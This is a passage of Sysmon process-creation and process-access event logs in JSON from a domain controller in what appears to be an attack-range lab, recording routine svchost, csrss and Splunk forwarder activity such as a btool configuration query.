05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001063890300}","TargetProcessId":"4004","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1742,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.115\r\nProcessGuid: {A837DB8D-01C7-5F25-0000-0010E18B0300}\r\nProcessId: 4028\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C6-5F25-0000-001081680300}\r\nParentProcessId: 3820\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.115","ProcessGuid":"{A837DB8D-01C7-5F25-0000-0010E18B0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C6-5F25-0000-001081680300}","ParentProcessId":"3820","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1743,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-001081680300}\r\nSourceProcessId: 3820\r\nSourceThreadId: 3824\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010E18B0300}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-001081680300}","SourceProcessId":"3820","SourceThreadId":"3824","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010E18B0300}","TargetProcessId":"4028","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1744,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010E18B0300}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010E18B0300}","TargetProcessId":"4028","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1745,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1746,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1747,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1748,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1749,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1750,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 